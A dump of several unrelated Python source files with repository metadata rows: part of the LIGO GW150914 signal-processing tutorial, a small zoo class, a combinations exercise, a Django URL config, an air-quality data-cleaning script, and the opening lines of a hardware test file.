# compute the amplitude spectral density (ASD) of the original data, and the filtered data:
NFFT = fs/2
Pxx_data, freqs = mlab.psd(data, Fs = fs, NFFT = NFFT)
Pxx_resp, freqs = mlab.psd(resp, Fs = fs, NFFT = NFFT)
# The asd is the square root; and let's normalize it to 1:
norm = np.sqrt(Pxx_data).mean()
asd_data = np.sqrt(Pxx_data)/norm
asd_resp = np.sqrt(Pxx_resp)/norm
# get the predicted filter frequency response using signal.freqz:
Nc = 2000
filt_resp = np.ones(Nc)
for coef in coefs:
b,a = coef
w,r = signal.freqz(b,a,worN=Nc)
filt_resp = filt_resp*np.abs(r)
freqf = (fs * 0.5 / np.pi) * w
# We "double pass" the filtering using filtfilt, so we square the filter response
filt_resp = filt_resp**2
# plot the ASDs
plt.figure()
plt.plot(freqs, asd_data,'b',label='white noise')
plt.plot(freqs, asd_resp,'m',label='filtered white noise')
plt.plot(freqf, filt_resp,'k--',label='filter response')
plt.xlim([0,600])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='center right')
plt.savefig('GW150914_filter.png')
# From the above, you can see that the gaussian noise (blue) is "white" - it is flat in frequency (all the way up to the Nyquist frequency of 2048 Hz, but we've cut the plot off at 600 Hz to see the effect of filtering). You can see in the filtered data (magenta) the effects of the bandpassing and the notches.
#
# Now let's filter the data, and plot the results:
# In[14]:
# filter the data:
strain_H1_filt = filter_data(strain_H1, coefs)
strain_L1_filt = filter_data(strain_L1, coefs)
# filter NR template as we do with the data:
NR_H1_filt = filter_data(NR_H1, coefs)
# plot the data prior to filtering:
plt.figure()
plt.plot(time-tevent,strain_H1,'r',label='H1 strain')
plt.plot(time-tevent,strain_L1,'g',label='L1 strain')
plt.xlim([-0.2,0.1])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('strain')
plt.legend(loc='lower right')
plt.title('aLIGO strain data near GW150914')
plt.savefig('GW150914_H1_strain_unfiltered.png')
# plot the data after filtering:
# first, shift L1 by 7 ms, and invert. See the GW150914 detection paper for why!
strain_L1_fils = -np.roll(strain_L1_filt,int(0.007*fs))
# We also have to shift the NR template by 2 ms to get it to line up properly with the data
plt.figure()
plt.plot(time-tevent,strain_H1_filt,'r',label='H1 strain')
plt.plot(time-tevent,strain_L1_fils,'g',label='L1 strain')
plt.plot(NRtime+0.002,NR_H1_filt,'k',label='matched NR waveform')
plt.xlim([-0.2,0.1])
plt.ylim([-1.5e-21,1.5e-21])
plt.xlabel('time (s) since '+str(tevent))
plt.ylabel('strain')
plt.legend(loc='lower left')
plt.title('aLIGO FILTERED strain data near GW150914')
plt.savefig('GW150914_H1_strain_filtered.png')
# The filtered data peak at around 1.e-21, 1000 times smaller than the scale in the first plot. The "DC" offset between H1 and L1 data visible in the first plot is no longer visible here; the bandpassing cuts off frequency components below around 40 Hz.
#
# Now, as with whitening, the signal is visible as an oscillation sweeping from low to high frequency from -0.10 seconds to 0, then damping down into the random noise. Again, it looks roughly the same in both detectors, after shifting and flipping the L1 data with respect to H1. It's exactly the kind of signal we expect from the inspiral, merger and ringdown of two massive black holes.
#
# And as with whitening, the NR waveform looks, by eye, to be a good match to the data in both detectors; the signal is consistent with the waveform predicted from General Relativity.
# ## Make sound files
#
# Make wav (sound) files from the filtered, downsampled data, +-2s around the event.
# In[15]:
# make wav (sound) files from the whitened data, +-2s around the event.
from scipy.io import wavfile
# function to keep the data within integer limits, and write to wavfile:
def write_wavfile(filename,fs,data):
d = np.int16(data/np.max(np.abs(data)) * 32767 * 0.9)
wavfile.write(filename,int(fs), d)
tevent = 1126259462.422 # Mon Sep 14 09:50:45 GMT 2015
deltat = 2. # seconds around the event
# index into the strain time series for this time interval:
indxt = np.where((time >= tevent-deltat) & (time < tevent+deltat))
# write the files:
write_wavfile("GW150914_H1_whitenbp.wav",int(fs), strain_H1_whitenbp[indxt])
write_wavfile("GW150914_L1_whitenbp.wav",int(fs), strain_L1_whitenbp[indxt])
write_wavfile("GW150914_NR_whitenbp.wav",int(fs), NR_H1_whitenbp)
# With good headphones, you'll hear a faint thump in the middle.
#
# We can enhance this by increasing the frequency;
# this is the "audio" equivalent of the enhanced visuals that NASA employs on telescope images with "false color".
#
# The code below will shift the data up by 400 Hz (by taking an FFT, shifting/rolling the frequency series, then inverse fft-ing). The resulting sound file will be noticeably more high-pitched, and the signal will be easier to hear.
# In[16]:
# function that shifts frequency of a band-passed signal
def reqshift(data,fshift=100,sample_rate=4096):
"""Frequency shift the signal by constant
"""
x = np.fft.rfft(data)
T = len(data)/float(sample_rate)
df = 1.0/T
nbins = int(fshift/df)
# print T,df,nbins,x.real.shape
y = np.roll(x.real,nbins) + 1j*np.roll(x.imag,nbins)
z = np.fft.irfft(y)
return z
# parameters for frequency shift
fs = 4096
fshift = 400.
speedup = 1.
fss = int(float(fs)*float(speedup))
# shift frequency of the data
strain_H1_shifted = reqshift(strain_H1_whitenbp,fshift=fshift,sample_rate=fs)
strain_L1_shifted = reqshift(strain_L1_whitenbp,fshift=fshift,sample_rate=fs)
NR_H1_shifted = reqshift(NR_H1_whitenbp,fshift=fshift,sample_rate=fs)
# write the files:
write_wavfile("GW150914_H1_shifted.wav",int(fs), strain_H1_shifted[indxt])
write_wavfile("GW150914_L1_shifted.wav",int(fs), strain_L1_shifted[indxt])
write_wavfile("GW150914_NR_shifted.wav",int(fs), NR_H1_shifted)
# ## Downsampling from 16384 Hz to 4096 Hz
#
# So far, we have been working with data sampled at fs=4096 Hz. This is entirely sufficient for signals with no frequency content above f_Nyquist = fs/2 = 2048 Hz, such as GW150914.
#
# We downsample to 4096 Hz to save on download time, disk space, and memory requirements. If, however, you are interested in signals with frequency content above 2048 Hz, you need the data sampled at the full rate of 16384 Hz.
#
# Here we demonstrate how to do that downsampling, and how it might limit you if you are interested in frequency content near 2048 Hz and above.
#
# First, download a LOSC data file containing 32 seconds of data at the full 16384 Hz rate, and another downsampled to 4096 Hz, and put them in your working directory / folder:
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_16_V1-1126259446-32.hdf5
# * https://losc.ligo.org/s/events/GW150914/H-H1_LOSC_4_V1-1126259446-32.hdf5
# In[17]:
# read in the data at 16384 Hz and at 4096 Hz:
fn_16 = 'H-H1_LOSC_16_V1-1126259446-32.hdf5'
strain_16, time_16, chan_dict = rl.loaddata(fn_16, 'H1')
fn_4 = 'H-H1_LOSC_4_V1-1126259446-32.hdf5'
strain_4, time_4, chan_dict = rl.loaddata(fn_4, 'H1')
# Make PSDs of each:
fs = 16384
NFFT = 1*fs
Pxx_16, freqs_16 = mlab.psd(strain_16, Fs = fs, NFFT = NFFT)
fs = 4096
NFFT = 1*fs
Pxx_4, freqs_4 = mlab.psd(strain_4, Fs = fs, NFFT = NFFT)
fmin = 10
fmax = 8192
plt.figure()
plt.loglog(freqs_16, np.sqrt(Pxx_16),'b',label='strain at 16384')
plt.loglog(freqs_4, np.sqrt(Pxx_4), 'm',label='strain at 4096')
plt.axis([fmin, fmax, 1e-24, 1e-19])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper center')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_H1_ASD_16384.png')
# Good agreement between 16384 Hz data and 4096 Hz data,
# up to around f_Nyquist = 2048 Hz. Let's zoom in for a closer look:
# In[18]:
# Zoom in on the 1000-2000 Hz region:
fmin = 1500
fmax = 2100
plt.figure()
plt.plot(freqs_16, np.sqrt(Pxx_16),'b',label='strain at 16384')
plt.plot(freqs_4, np.sqrt(Pxx_4), 'm',label='strain at 4096')
plt.axis([fmin, fmax, 1e-23, 5e-23])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper center')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_H1_ASD_16384_zoom.png')
# The downsampled data deviate significantly from the original above ~1700 Hz. This is an undesirable, but inevitable result of downsampling (decimating). The plus side is that for frequencies less than 80% of Nyquist, the data are faithfully reproduced.
#
# If frequency content above that point is important to you, you need to use the 16384 Hz data.
#
# Else, you can save download time, disk space and memory by using the 4096 Hz data.
# In[19]:
# Now downsample the 16384 Hz data and compare with the 4096 Hz data
factor = 4
numtaps = 61
strain_4new = signal.decimate(strain_16, factor, numtaps-1,ftype='fir')
fs = 4096
NFFT = 1*fs
Pxx_4new, freqs_4 = mlab.psd(strain_4new, Fs = fs, NFFT = NFFT)
fmin = 1500
fmax = 2100
plt.figure()
plt.plot(freqs_4, np.sqrt(Pxx_4new),'b',label='strain at 4096 from decimate')
plt.plot(freqs_4, np.sqrt(Pxx_4), 'm--',label='strain at 4096 from file')
plt.axis([fmin, fmax, 1e-23, 5e-23])
plt.grid('on')
plt.ylabel('ASD (strain/rtHz)')
plt.xlabel('Freq (Hz)')
plt.legend(loc='upper left')
plt.title('Advanced LIGO strain data near GW150914')
plt.savefig('GW150914_H1_ASD_4096_zoom.png')
# The two traces are on top of each other, as expected. That's how we made the downsampled data in the first place.
# From the above, we learn exactly how LOSC downsamples the strain time series from 16384 Hz to 4096 Hz
# (ie, using scipy.decimate), and that if you are interested in frequency content above ~ 1700 Hz,
# use the 16384 Hz sample rate data instead.
# ## Data segments
#
# As mentioned above, LIGO strain time series data has gaps (filled with NaNs) when the detectors are not taking valid ("science quality") data. Analyzing these data requires the user to loop over "segments" of valid data stretches.
#
# For this GW150914 data release, the data have no gaps. Let's verify this, using the L1 data file containing 32 seconds of data sampled at 4096 Hz.
#
# You are welcome to repeat this with H1 data, with files containing 4096 seconds of data, and with data sampled at 16384 Hz. All of the relevant files are listed near the top of this tutorial.
# In[20]:
# read in the data at 4096 Hz:
fn = 'L-L1_LOSC_4_V1-1126259446-32.hdf5'
strain, time, chan_dict = rl.loaddata(fn, 'L1')
print "Contents of all the key, value pairs in chan_dict"
for keys,values in chan_dict.items():
print(keys)
print(values)
print "We see that all keys have 32 seconds of '1', meaning the data pass all data quality flags"
print "and have no HW injections, except there are CW injections in L1."
print " "
print 'Total number of non-NaNs in these data = ',np.sum(~np.isnan(strain))
print 'GPS start, GPS stop and length of all data in this file = ',time[0], time[-1],len(strain)
# select the level of data quality; default is "DATA" but "CBC_CAT3" is a conservative choice:
DQflag = 'CBC_CAT3'
# readligo.py method for computing segments (start and stop times with continuous valid data):
segment_list = rl.dq_channel_to_seglist(chan_dict[DQflag])
print 'Number of segments with DQflag',DQflag,' = ',len(segment_list)
# loop over segments and print out start, stop and length:
iseg = 0
for segment in segment_list:
time_seg = time[segment]
seg_strain = strain[segment]
print 'GPS start, GPS stop and length of segment',iseg, 'in this file = ',time_seg[0], time_seg[-1], len(seg_strain)
iseg = iseg+1
# here is where you would insert code to analyze the data in this segment.
# now look at segments with no CBC hardware injections:
DQflag = 'NO_CBC_HW_INJ'
segment_list = rl.dq_channel_to_seglist(chan_dict['NO_CBC_HW_INJ'])
print 'Number of segments with DQflag',DQflag,' = ',len(segment_list)
iseg = 0
for segment in segment_list:
time_seg = time[segment]
seg_strain = strain[segment]
print 'GPS start, GPS stop and length of segment',iseg, 'in this file = ',time_seg[0], time_seg[-1], len(seg_strain)
iseg = iseg+1
|
[
"[email protected]"
] | |
75b8cf6fde95fbd9a46ab0c2c5277b706714856b
|
ce6538b5b7da162c1c690a346e7ec9ae0a6291f3
|
/wild_cat_zoo/project/cheetah.py
|
92f02831fe0904412100be1467c39f16c02a2ad7
|
[] |
no_license
|
DaniTodorowa/Softuni
|
391f13dd61a6d16cd48ee06e9b35b2fd931375df
|
f7c875fda4e13ec63152671509aaa6eca29d7f50
|
refs/heads/master
| 2022-11-25T23:34:49.744315 | 2020-08-02T08:23:44 | 2020-08-02T08:23:44 | 278,938,559 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 298 |
py
|
class Cheetah:
def __init__(self, name, gender, age):
self.name = name
self.gender = gender
self.age = age
    @staticmethod
    def get_needs():
        return 60
def __repr__(self):
return f"Name: {self.name}, Age: {self.age}, Gender: {self.gender}"
|
[
"[email protected]"
] | |
c02054b0e7144f761e863a5a249d40a75b1c8cc5
|
6a609bc67d6a271c1bd26885ce90b3332995143c
|
/exercises/exhaustive-search/combinations_ii.py
|
46561751342eaead6317019aa18b093dfc811644
|
[] |
no_license
|
nahgnaw/data-structure
|
1c38b3f7e4953462c5c46310b53912a6e3bced9b
|
18ed31a3edf20a3e5a0b7a0b56acca5b98939693
|
refs/heads/master
| 2020-04-05T18:33:46.321909 | 2016-07-29T21:14:12 | 2016-07-29T21:14:12 | 44,650,911 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 668 |
py
|
# -*- coding: utf-8 -*-
"""
Given a list of integer lists. Each time take an item from each list. Find all the combinations.
"""
class Solution(object):
def combine(self, arr):
"""
        :type arr: List[List[int]]
:rtype: List[List[int]]
"""
def dfs(res, pos):
if len(res) == len(arr):
results.append(res)
return
for i in xrange(len(arr[pos])):
dfs(res + [arr[pos][i]], pos + 1)
results = []
dfs([], 0)
return results
if __name__ == '__main__':
arr = [[1,2], [3,4], [5,6,7]]
sol = Solution()
print sol.combine(arr)
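    # expected output: 12 combinations, [1, 3, 5], [1, 3, 6], [1, 3, 7],
    # [1, 4, 5], ..., [2, 4, 7]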
|
[
"[email protected]"
] | |
c359621f88fe116601d909b5dce736eebf473a4f
|
132c7b0c8ba606a249fbdfe24f9d73e7e224d260
|
/sanyuapp/urls.py
|
718ddf53afbfca5bc73c30fb4040c7281a875e3f
|
[] |
no_license
|
sanyuOnline/sanyu-webapp
|
dafa3505d7f3d6eca225ca6b4dce3fa683d5e9fe
|
c8e3824146bb9eb4dcf971a1cdef2bc4475385f1
|
refs/heads/main
| 2023-08-31T12:52:06.104078 | 2021-10-27T07:03:09 | 2021-10-27T07:03:09 | 406,589,964 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,073 |
py
|
"""sanyuapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('admin/', admin.site.urls),
path('users/', include('users.urls')),
path('users/', include('django.contrib.auth.urls')),
path('', include('pages.urls')),
path('', include('blog.urls')),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
[
"[email protected]"
] | |
f1fc5e04b67e273abf07193662fafc8712fb4c60
|
07c262960dde4da25e48030d1d4727e2e4392e45
|
/hw1/data/prepcocess.py
|
ef43c8e69176db0b4d21c0c6aa853863cda6f2e0
|
[] |
no_license
|
a127000555/ML2018SPRING
|
2aae1fdaf92ff439e459a062a04d7b73fc3fb502
|
44d7ddf1abfae0c130cb0d57bd6bafbd14764eba
|
refs/heads/master
| 2021-03-30T21:03:22.259450 | 2018-07-05T16:01:25 | 2018-07-05T16:01:25 | 124,531,741 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,342 |
py
|
import csv
import numpy as np
cin = csv.reader(open('train.csv','r',encoding='big5'))
table = [row for row in cin]
#print(np.array(table))
stamp = 0
banned = ['2014/3/12','2014/4/2' , '2014/4/6']
all_training = []
for row_idx_head in range(1,len(table),18):
if table[row_idx_head][0] in banned:
continue
day = { 'id' : table[row_idx_head][0] }
for row_idx in range(row_idx_head,row_idx_head+18):
row = table[row_idx]
day.update({ row[2] : row[3:]})
	# RAINFALL: convert to a binary rained / no-rain flag
rain = day['RAINFALL']
for idx in range(len(rain)):
if rain[idx] == 'NR' or float(rain[idx]) < 3:
rain[idx] = '0.0'
else:
rain[idx] = '1'
day.update( {'RAINFALL' : rain})
# PM2.5 error correct
pm = list(map(float,day['PM2.5']))
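	# NOTE: `Error` is deliberately undefined -- raising it produces a
	# NameError that the bare `except` below catches, skipping this day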
try:
for idx in range(len(pm)):
if pm[idx] < 1 or pm[idx] > 110:
raise Error()
if 0 < idx and idx < len(pm)-1:
if abs (pm[idx-1] - pm[idx+1] ) < 20 and abs (pm[idx] - pm[idx+1]) > 18:
pass
#print((pm[idx-1],pm[idx],pm[idx+1]),pm , sep='\n')
#raise Error()
except:
continue
day.update( {'PM2.5' : pm})
# PM10 error correct
pm = list(map(float,day['PM10']))
try:
for item in pm:
if item == 0 or item >200:
#print(pm)
raise Error()
except:
continue
day.update( {'PM10' : pm})
# CO error correct
co = list(map(float,day['CO']))
try:
pass
#print(np.array(co))
# for item in co:
# if item == 0 or item >200:
# print(pm)
# raise Error()
except:
continue
day.update( {'CO' : co})
wd = list(map(float,day['WIND_DIREC']))
	try:
		# Encode the circular wind direction as (cos, sin) so that
		# 359 degrees and 1 degree end up close in feature space.
		day.update( {'WD_COS' : np.cos(np.array(wd) * np.pi / 180)})
		day.update( {'WD_SIN' : np.sin(np.array(wd) * np.pi / 180)})
	except Exception as e:
		print(e)
		continue
all_training.append(day)
#exit(0)
#print(all_training)
import pickle
with open('date_process/train.pickle','wb') as fout:
pickle.dump(all_training,fout)
cin = csv.reader(open('test.csv','r',encoding='big5'))
table = [row for row in cin]
#print(np.array(table) , len(table),18)
all_training = []
for row_idx_head in range(0,len(table),18):
if table[row_idx_head][0] in banned:
continue
day = { 'id' : table[row_idx_head][0] }
for row_idx in range(row_idx_head,row_idx_head+18):
row = table[row_idx]
day.update({ row[1] : row[2:]})
# RAINFALL correct
rain = day['RAINFALL']
for idx in range(len(rain)):
if rain[idx] == 'NR':
rain[idx] = '0.0'
day.update( {'RAINFALL' : rain})
# PM2.5 error correct
pm = list(map(float,day['PM2.5']))
try:
for idx in range(len(pm)):
if pm[idx] <= 0 :
if 0 < idx and idx < len(pm)-1 and 5 < pm[idx+1] and pm[idx+1]< 100:
pm[idx] = (pm[idx-1] + pm[idx+1])/2
else:
# edge processing
if idx == 0:
pm[idx] = ( pm[idx+1] + pm[idx+2] )/2
if idx == len(pm)-1:
pm[idx] = pm[idx-1]
except:
continue
try:
for idx in range(len(pm)):
if 0 < idx and idx < len(pm)-1:
if abs (pm[idx-1] - pm[idx+1] ) < 20 and abs (pm[idx] - pm[idx+1]) > 20:
pm[idx] = ( pm[idx-1] + pm[idx+1] )/2
#print((pm[idx-1],pm[idx],pm[idx+1]),pm , sep='\n')
except:
continue
day.update( {'PM2.5' : pm})
#print(day['PM2.5'])
# PM10 error correct
pm = list(map(float,day['PM10']))
try:
for idx in range(len(pm)):
if pm[idx] <= 0 :
if 0 < idx and idx < len(pm)-1 and 5 < pm[idx+1] and pm[idx+1]< 100:
#print('=>' , pm)
pm[idx] = (pm[idx-1] + pm[idx+1])/2
#print('<=' , pm)
else:
# edge processing
if idx == 0:
pm[idx] = ( pm[idx+1] + pm[idx+2] )/2
if idx == len(pm)-1:
pm[idx] = pm[idx-1]
except:
continue
day.update( {'PM10' : pm})
all_training.append(day)
#print(all_training)
with open('date_process/test.pickle','wb') as fout:
pickle.dump(all_training,fout)
'''
PM 2.5 cleaning:
2014/3/12 [65.0, 61.0, 66.0, 66.0, 69.0, 131.0, 919.0, 919.0, 919.0, 0.0, 0.0, 908.0, 914.0, 914.0, 914.0, 70.0, 72.0, 82.0, 86.0, 97.0, 98.0, 98.0, 87.0, 76.0]
919.0 can't tell.
2014/4/2 [21.0, 22.0, 26.0, 15.0, 12.0, 3.0, 10.0, 13.0, 19.0, 16.0, 0.0, 631.0, 5.0, 0.0, 12.0, 15.0, 7.0, 10.0, 18.0, 29.0, 34.0, 37.0, 50.0, 51.0]
631.0 can't tell.
2014/4/6 NMHC / THC chaos.
'''
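# A minimal sketch (not part of the original script) of the neighbour-
# interpolation rule used in the test-set cleaning above: non-positive
# readings are replaced by the mean of their neighbours, with simple edge
# handling. The function name is illustrative only.
def repair_nonpositive(seq):
	seq = list(seq)
	for i, v in enumerate(seq):
		if v <= 0:
			if 0 < i < len(seq) - 1:
				seq[i] = (seq[i - 1] + seq[i + 1]) / 2
			elif i == 0 and len(seq) > 2:
				seq[i] = (seq[1] + seq[2]) / 2
			elif i == len(seq) - 1 and i > 0:
				seq[i] = seq[i - 1]
	return seq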
|
[
"[email protected]"
] | |
314255e054c0ccca2a072d2515304f2f4f772b2d
|
2896efe044a9b5d7caa545f39eb8bc12e514f275
|
/lab02a.py
|
2d8d43abff4d51d2515919aaed1bf3c824c38378
|
[] |
no_license
|
riamokashi/Computer-Science-Labs
|
8d4acf23f3b7d0f4b5b9cb7475caaeef136fe047
|
15b662f46a37dbe20031ef6ecb0e063fce3d7df4
|
refs/heads/master
| 2020-08-16T04:30:31.001123 | 2019-10-16T04:11:43 | 2019-10-16T04:11:43 | 215,454,752 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 767 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 9 16:36:12 2019
@author: riamokashi
"""
odd_sum = 0
even_sum = 0
odd_count = 0
even_count = 0
positive_int_count = 0
while True:
n_str = input("Input an integer (0 terminates): ")
n_int = int(n_str)
if n_int == 0:
break
elif n_int < 0:
continue
elif n_int % 2 == 1:
odd_sum += n_int
odd_count += 1
elif n_int % 2 == 0:
even_sum += n_int
even_count += 1
positive_int_count += 1
print()
print("sum of odds:", odd_sum)
print("sum of evens:", even_sum)
print("odd count:", odd_count)
print("even count:", even_count)
print("total positive int count:", positive_int_count)
|
[
"[email protected]"
] | |
57d831e8dd13648f57838ae881015f3fc20c13d1
|
ebb6deb23eba704efeecd300ad42770f73007470
|
/ind1_1.py
|
bbe0af5bfe6ca114ffb098abf03806b124b1f7b1
|
[
"MIT"
] |
permissive
|
IshchenkoMaksim/lab6
|
a1d275c0008c5d446e670ec6092f37e56ea8c1c1
|
92c1b298e0c97c22fbd43fe81ddc510ef994cbc3
|
refs/heads/main
| 2023-05-02T15:53:13.136710 | 2021-05-12T13:14:13 | 2021-05-12T13:14:13 | 365,343,695 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 652 |
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Task 1, variant 1: read a list A of 10 elements, find the largest element
# and swap it with the first element. Print the transformed list.
import sys
if __name__ == '__main__':
A = list(map(int, input().split()))
if len(A) != 10:
print("Неверный размер списка", file=sys.stderr)
exit(1)
    n = A.index(max(A))  # index of the largest element
if n == 0:
print(A)
else:
A[0], A[n] = A[n], A[0]
print(A)
|
[
"[email protected]"
] | |
e9b4572ab1f8e1c87a7d0030bcf82691a6a035e5
|
880103c6f9bdc9d5a7a8633c3e4d108c964e9b89
|
/devil/devil/android/tools/device_monitor.py
|
2b3503174c8a364463e242fa2f450a76e5b3047f
|
[
"BSD-3-Clause"
] |
permissive
|
ateleshev/catapult
|
c3645f0fb0d4e929b5baebea33307b765225cb2f
|
faf60eb37f8b9828eddb30c8397b333eb1d89204
|
refs/heads/master
| 2021-01-22T19:08:47.140355 | 2017-03-16T01:01:54 | 2017-03-16T01:01:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,936 |
py
|
#!/usr/bin/env python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Launches a daemon to monitor android device temperatures & status.
This script will repeatedly poll the given devices for their temperatures and
status every 60 seconds and dump the stats to file on the host.
"""
import argparse
import collections
import json
import logging
import logging.handlers
import os
import re
import socket
import sys
import time
if __name__ == '__main__':
sys.path.append(
os.path.abspath(os.path.join(os.path.dirname(__file__),
'..', '..', '..')))
from devil import devil_env
from devil.android import battery_utils
from devil.android import device_blacklist
from devil.android import device_errors
from devil.android import device_utils
# Various names of sensors used to measure cpu temp
CPU_TEMP_SENSORS = [
# most nexus devices
'tsens_tz_sensor0',
# android one
'mtktscpu',
# nexus 9
'CPU-therm',
]
DEVICE_FILE_VERSION = 1
# TODO(bpastene): Remove the old file once sysmon has been updated to read the
# new status file.
DEVICE_FILES = [
os.path.join(os.path.expanduser('~'), 'android_device_status.json'),
os.path.join(
os.path.expanduser('~'), '.android',
'%s__android_device_status.json' % socket.gethostname().split('.')[0]
),
]
MEM_INFO_REGEX = re.compile(r'.*?\:\s*(\d+)\s*kB') # ex: 'MemTotal: 185735 kB'
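# e.g. MEM_INFO_REGEX.match('MemTotal:       185735 kB').group(1) == '185735'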
def get_device_status(device):
"""Polls the given device for various info.
Returns: A dict of the following format:
{
'battery': {
'level': 100,
'temperature': 123
},
'build': {
'build.id': 'ABC12D',
'product.device': 'chickenofthesea'
},
'mem': {
'avail': 1000000,
'total': 1234567,
},
'processes': 123,
'state': 'good',
'temp': {
'some_sensor': 30
},
'uptime': 1234.56,
}
"""
status = collections.defaultdict(dict)
# Battery
battery = battery_utils.BatteryUtils(device)
battery_info = battery.GetBatteryInfo()
try:
level = int(battery_info.get('level'))
except (KeyError, TypeError, ValueError):
level = None
if level and level >= 0 and level <= 100:
status['battery']['level'] = level
try:
temperature = int(battery_info.get('temperature'))
except (KeyError, TypeError, ValueError):
temperature = None
if temperature:
status['battery']['temperature'] = temperature
# Build
status['build']['build.id'] = device.build_id
status['build']['product.device'] = device.build_product
# Memory
mem_info = ''
try:
mem_info = device.ReadFile('/proc/meminfo')
except device_errors.AdbShellCommandFailedError:
logging.exception('Unable to read /proc/meminfo')
for line in mem_info.splitlines():
match = MEM_INFO_REGEX.match(line)
if match:
try:
value = int(match.group(1))
except ValueError:
continue
key = line.split(':')[0].strip()
if 'MemTotal' == key:
status['mem']['total'] = value
elif 'MemFree' == key:
status['mem']['free'] = value
# Process
try:
lines = device.RunShellCommand('ps', check_return=True)
status['processes'] = len(lines) - 1 # Ignore the header row.
except device_errors.AdbShellCommandFailedError:
logging.exception('Unable to count process list.')
# CPU Temps
# Find a thermal sensor that matches one in CPU_TEMP_SENSORS and read its
# temperature.
files = []
try:
files = device.RunShellCommand(
'grep -lE "%s" /sys/class/thermal/thermal_zone*/type' % '|'.join(
CPU_TEMP_SENSORS), check_return=True)
except device_errors.AdbShellCommandFailedError:
logging.exception('Unable to list thermal sensors.')
for f in files:
try:
sensor_name = device.ReadFile(f).strip()
temp = float(device.ReadFile(f[:-4] + 'temp').strip()) # s/type^/temp
status['temp'][sensor_name] = temp
except (device_errors.AdbShellCommandFailedError, ValueError):
logging.exception('Unable to read thermal sensor %s', f)
# Uptime
try:
uptimes = device.ReadFile('/proc/uptime').split()
status['uptime'] = float(uptimes[0]) # Take the first field (actual uptime)
except (device_errors.AdbShellCommandFailedError, ValueError):
logging.exception('Unable to read /proc/uptime')
status['state'] = 'available'
return status
def get_all_status(blacklist):
status_dict = {
'version': DEVICE_FILE_VERSION,
'devices': {},
}
healthy_devices = device_utils.DeviceUtils.HealthyDevices(blacklist)
parallel_devices = device_utils.DeviceUtils.parallel(healthy_devices)
results = parallel_devices.pMap(get_device_status).pGet(None)
status_dict['devices'] = {
device.serial: result for device, result in zip(healthy_devices, results)
}
if blacklist:
for device, reason in blacklist.Read().iteritems():
status_dict['devices'][device] = {
'state': reason.get('reason', 'blacklisted')}
status_dict['timestamp'] = time.time()
return status_dict
def main(argv):
"""Launches the device monitor.
Polls the devices for their battery and cpu temperatures and scans the
blacklist file every 60 seconds and dumps the data to DEVICE_FILE.
"""
parser = argparse.ArgumentParser(
description='Launches the device monitor.')
parser.add_argument('--adb-path', help='Path to adb binary.')
parser.add_argument('--blacklist-file', help='Path to device blacklist file.')
args = parser.parse_args(argv)
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
handler = logging.handlers.RotatingFileHandler(
'/tmp/device_monitor.log', maxBytes=10 * 1024 * 1024, backupCount=5)
fmt = logging.Formatter('%(asctime)s %(levelname)s %(message)s',
datefmt='%y%m%d %H:%M:%S')
handler.setFormatter(fmt)
logger.addHandler(handler)
devil_dynamic_config = devil_env.EmptyConfig()
if args.adb_path:
devil_dynamic_config['dependencies'].update(
devil_env.LocalConfigItem(
'adb', devil_env.GetPlatform(), args.adb_path))
devil_env.config.Initialize(configs=[devil_dynamic_config])
blacklist = (device_blacklist.Blacklist(args.blacklist_file)
if args.blacklist_file else None)
logging.info('Device monitor running with pid %d, adb: %s, blacklist: %s',
os.getpid(), args.adb_path, args.blacklist_file)
while True:
start = time.time()
status_dict = get_all_status(blacklist)
for device_file in DEVICE_FILES:
with open(device_file, 'wb') as f:
json.dump(status_dict, f, indent=2, sort_keys=True)
logging.info('Got status of all devices in %.2fs.', time.time() - start)
time.sleep(60)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
|
[
"[email protected]"
] | |
ca128136c7a63d4f70b2d6bc02bb47eeb3885205
|
6d2df64e318983640a3f26e6ef95ffd00a166e54
|
/Development/Tests/Vin_Voltage.py
|
684a12a6b3a9af7e45b444f9d3190699d08cd538
|
[] |
no_license
|
sgbbhat/SolderStationAuto
|
2c9145f87b1e404d0e319fcdfe9612f2f095b30a
|
8ed10cd8228253b7679533cc5d4f71c93b2803a7
|
refs/heads/master
| 2020-06-13T17:34:21.552052 | 2019-10-30T19:42:26 | 2019-10-30T19:42:26 | 194,733,660 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,150 |
py
|
# Function to measure battery voltage and display test
from os import popen  # only popen is used; avoids 'from os import *'
import re
from Tests.displayResult import displayResult
from tkinter import messagebox
